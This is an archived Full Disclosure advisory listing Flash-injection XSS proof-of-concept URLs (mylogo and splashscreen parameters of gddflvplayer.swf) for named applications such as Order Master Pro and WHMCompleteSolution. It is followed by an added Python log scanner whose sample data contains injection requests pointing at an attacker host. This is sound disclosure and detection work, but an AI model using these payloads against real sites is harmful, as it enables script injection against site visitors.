Full Disclosure mailing list archives
Vulnerabilities in multiple web applications with GDD FLVPlayer
From: "MustLive" <mustlive () websecurity com ua>
Date: Sun, 25 Aug 2013 19:01:46 +0300
Hello list!

These are Content Spoofing and Cross-Site Scripting vulnerabilities in multiple web applications that use GDD FLVPlayer. Earlier I wrote about vulnerabilities in GDD FLVPlayer itself (http://seclists.org/fulldisclosure/2013/Aug/247). It is a video and audio player which is used at thousands of web sites and in multiple web applications.
Among them are Order Master Pro, CMS Pask (Pixelwerk admin), gddflvplayer for MODx, Pixelfind Administrator, WHMCompleteSolution, and other web applications. This Flash video and audio player is also used at many web sites as a standalone web application.
-------------------------
Affected products:
-------------------------

Vulnerable are web applications which use GDD FLVPlayer v3.635 and previous versions.

Vulnerable are the following web applications:
Order Master Pro (all versions)
CMS Pask 3 (Pixelwerk admin v.3.3) and previous versions
gddflvplayer for MODx (all versions)
Pixelfind Administrator (all versions)
WHMCompleteSolution (all versions)

-------------------------
Affected vendors:
-------------------------

GDD FLVPlayer was developed by GeDeDe.
GeDeDe
http://www.gdd.ro

----------
Details:
----------

XSS (via Flash Injection) (WASC-08):

Order Master Pro:
http://site/op/video/gddflvplayer.swf?mylogo=xss.swf
http://site/op/video/gddflvplayer.swf?splashscreen=xss.swf

CMS Pask 3 (Pixelwerk admin):
http://site/gddflvplayer.swf?mylogo=xss.swf
http://site/gddflvplayer.swf?splashscreen=xss.swf

gddflvplayer for MODx:
http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?mylogo=xss.swf
http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?splashscreen=xss.swf

Pixelfind Administrator:
http://site/includes/flash/gddflvplayer.swf?mylogo=xss.swf
http://site/includes/flash/gddflvplayer.swf?splashscreen=xss.swf

WHMCompleteSolution:
http://site/player/gddflvplayer.swf?mylogo=xss.swf
http://site/player/gddflvplayer.swf?splashscreen=xss.swf

These are examples of the XSS vulnerabilities; for examples of the 8 Content Spoofing (CS) vulnerabilities, see the above-mentioned advisory.
I mentioned these vulnerabilities at my site (http://websecurity.com.ua/6727/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
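All of the PoC URLs in the advisory work the same way: the player takes the mylogo and splashscreen parameters from the query string and loads whatever SWF they name, so the tell-tale in a web server access log is a request for gddflvplayer.swf whose query string passes a .swf or an off-site URL through one of those two parameters. The following is an added example, not code from the advisory, from MustLive, or from GeDeDe: a small Python scanner that flags such requests in an Apache/nginx "combined"-format access log. The log lines are constructed, the host name www.example.org is hypothetical, and the rule that any .swf value is suspicious rests on the assumption that a legitimate logo or splash screen is an image file rather than a SWF.

```python
"""Flag Flash-injection attempts against gddflvplayer.swf in an access log.

Added example, not part of the original advisory. Assumes the Apache/nginx
"combined" log format; SAMPLE_LOG below is constructed test data.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Query-string parameters that gddflvplayer.swf (v3.635 and earlier)
# loads as an external SWF, per the advisory.
INJECTABLE_PARAMS = ("mylogo", "splashscreen")

# Combined log format: client ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def is_injection_attempt(request_path, site_host):
    """Return (param, value) for the first injectable parameter whose value
    names a .swf file or points at a host other than site_host; else None.

    Relative values ("xss.swf"), absolute URLs and scheme-relative URLs
    ("//evil/x.swf") are all handled via urlsplit. Percent-encoding in the
    query string is decoded by parse_qs before inspection.
    """
    parts = urlsplit(request_path)
    if not parts.path.lower().endswith("gddflvplayer.swf"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    for param in INJECTABLE_PARAMS:
        for value in qs.get(param, []):
            target = urlsplit(value)
            # Off-site host: SWF would be fetched from an attacker's server.
            if target.hostname and target.hostname != site_host.lower():
                return (param, value)
            # Assumption: a legitimate logo/splash asset is an image, so any
            # .swf (even same-host) is treated as an injection attempt.
            if target.path.lower().endswith(".swf"):
                return (param, value)
    return None


def scan_log(log_text, site_host):
    """Parse combined-format log lines and return one finding per request
    that is_injection_attempt() flags. Unparseable lines are skipped."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = is_injection_attempt(m.group("path"), site_host)
        if hit:
            param, value = hit
            findings.append({
                "client": m.group("client"),
                "time": m.group("time"),
                "path": m.group("path"),
                "param": param,
                "value": value,
            })
    return findings


# Constructed sample: two benign requests, three injection attempts (one of
# them percent-encoded), and one benign request carrying an image logo.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Aug/2013:19:01:46 +0300] "GET /op/video/ HTTP/1.1" 200 5123
203.0.113.5 - - [25/Aug/2013:19:01:47 +0300] "GET /op/video/gddflvplayer.swf HTTP/1.1" 200 91442
198.51.100.7 - - [25/Aug/2013:19:02:10 +0300] "GET /op/video/gddflvplayer.swf?mylogo=http://attacker.example/xss.swf HTTP/1.1" 200 91442
198.51.100.7 - - [25/Aug/2013:19:02:12 +0300] "GET /player/gddflvplayer.swf?splashscreen=xss.swf HTTP/1.1" 200 91442
198.51.100.7 - - [25/Aug/2013:19:02:15 +0300] "GET /player/gddflvplayer.swf?mylogo=%2F%2Fattacker.example%2Fx.swf HTTP/1.1" 200 91442
192.0.2.9 - - [25/Aug/2013:19:03:00 +0300] "GET /player/gddflvplayer.swf?mylogo=logo.png HTTP/1.1" 200 91442
"""

if __name__ == "__main__":
    # www.example.org is a hypothetical host name for the scanned site.
    for f in scan_log(SAMPLE_LOG, "www.example.org"):
        print(f"{f['time']} {f['client']} {f['param']}={f['value']}")
```

Note that the Host header is not part of the combined format, so the site's own host name has to be supplied by the caller; without it the scanner could not tell an absolute same-site URL from an off-site one. The same function can be pointed at any of the install paths listed in the advisory, since it matches on the gddflvplayer.swf filename rather than the directory.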
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/